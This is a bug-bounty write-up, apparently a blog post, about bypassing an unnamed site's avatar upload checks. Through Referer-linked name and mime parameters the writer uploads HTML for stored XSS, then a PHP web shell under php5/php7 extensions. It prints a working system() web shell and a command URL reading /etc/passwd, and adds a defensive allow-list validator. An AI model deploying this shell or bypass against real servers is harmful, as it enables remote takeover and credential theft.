How I found RCE But Got Duplicated

Smile Hacker
Oct 15 · 3 min read

So first of all, I cannot show you the name of the site because of security issues, but let me tell you how I was able to bypass the file upload functionality and upload a shell to the website.

First I tried the edit profile screen, looking for an XSS, because XSS pays a lot, but sadly I could not find any XSS in any possible parameter. So I thought: let's upload a shell. For that I checked whether the image was being uploaded to the same app or to a third-party app. All the other images on that website were at https://victimsite.com/images/static/image.jpg, and when I uploaded a simple image to the profile it was at https://victimsite.com/images/users/<ProfilID>/smilehacker.jpg

The next thing was to try uploading any other extension, but if I tried uploading any extension other than JPG or PNG, it popped up a forbidden error. So it was clear that there were restrictions on other MIME types.

So I thought I needed to try a GET request containing the filename and mime: https://victimsite.com/settings/<id>/avatar?name=test.png&mime=image%2Fpng

The response code of that request was a simple 200 OK, and the next request was a PUT request uploading the file to the images directory:

https://victimsite.com/users/<id>/testtts.png

I tried changing the content of the PUT request to HTML or TXT, but it responded with error code 500 [That sucks…]. Later I realized that it was because I forgot that the Referer header contains the last URL. So I tested it again, changing the name and mime in the first GET request (since that URL was added as the Referer to the next PUT request), and then changed the content and file type in the PUT request.

AND I GOT 200: https://victimsite.com/settings/<id>/avatar?name=smile.html&mime=text%2Fhtml

Following that request, I made changes to the PUT request to upload an HTML file, and it was a success. Now I had a stored XSS using an HTML file; I bypassed the Same-Origin Policy, the X-Frame-Options header and more……

Now I decided to upload a PHP file with my remote code:

```php
// Minimal web shell: runs the cmd parameter (GET or POST) through system()
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
```

It's a simple PHP backdoor which I found on Google, TBH. But when I uploaded the PHP code it gave me a 403 status code (feels like WTF is happening).

So I thought: let's try some other extensions (I was thinking that would be the last try; after it I'd leave it). And when I tried php5 and php7, it worked like magic. Target: https://victimsite.com/images/users/<id>/try.phps?cmd=cat+/etc/passwd
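The bypass above works because the server looked for one bad extension instead of accepting a small set of good ones, and because it trusted the name and mime the client sent in the query string. As an added example that is not from the original post and not the target's code, here is a deny-list check of the kind the write-up implies, side by side with an allow-list check that also verifies the file signature. The handler-extension set, the helper names and the sample bytes are my assumptions; which extensions actually execute depends on the web server's handler mapping.

```python
"""Deny-list vs allow-list upload validation (added example, not the target's code)."""
import os
import re

# Extensions commonly mapped to the PHP handler. Which of these actually execute
# depends on the server's handler configuration; this set is an assumption.
PHP_HANDLER_EXTS = {"php", "php3", "php4", "php5", "php7", "phps", "phtml", "phar"}

# The only types an avatar endpoint is meant to accept, and the mime each implies.
EXT_TO_MIME = {"png": "image/png", "jpg": "image/jpeg", "jpeg": "image/jpeg"}

# File signatures from the PNG and JPEG specs.
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff"}

# Constructed sample payloads (first bytes only; enough for signature checks).
PNG_SAMPLE = MAGIC["png"] + b"\x00\x00\x00\rIHDR"
PHP_SAMPLE = b"<?php system($_REQUEST['cmd']); ?>"


def _ext(filename):
    """Last extension, lower-cased, or '' when there is none."""
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def vulnerable_check(filename, client_mime):
    """Deny-list check of the kind the write-up implies: blocks '.php' only and
    never looks at the bytes or the mime. Returns True when the upload is accepted."""
    return _ext(filename) != "php"


def uncovered_by_denylist(denylist):
    """Handler extensions a deny-list still leaves reachable (the php5/php7 gap)."""
    return PHP_HANDLER_EXTS - {e.lower() for e in denylist}


def hardened_check(filename, client_mime, content):
    """Allow-list the extension, require the client mime to match it, and
    verify the content signature. Anything else is rejected."""
    if filename != os.path.basename(filename):
        return False  # path separators are never legitimate in an upload name
    # Exactly one dot, so 'shell.php.png' style double extensions fail here.
    m = re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})", filename)
    if not m:
        return False
    ext = m.group(1).lower()
    if ext not in EXT_TO_MIME or client_mime != EXT_TO_MIME[ext]:
        return False
    return content.startswith(MAGIC[ext])


if __name__ == "__main__":
    # The three uploads from the write-up, through both checks.
    for name, mime, body in [("try.php", "image/png", PHP_SAMPLE),
                             ("try.php5", "image/png", PHP_SAMPLE),
                             ("smile.html", "text/html", b"<html>")]:
        print(name, "denylist:", vulnerable_check(name, mime),
              "allowlist:", hardened_check(name, mime, body))
    print("left open by blocking only .php:", sorted(uncovered_by_denylist({"php"})))
```

Even with the allow-list, the stored file should get a server-generated name rather than the one the client supplied, and the upload directory should be served with script execution disabled; the signature check stops the naive PHP-in-a-PNG upload but not a valid image with code appended, so execution must be off regardless.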

(MY FIRST RCE)

They fixed this bug after a week, but due to company policy I cannot show you the name.

THANKS FOR YOUR TIME

Regards,

Smilehacker
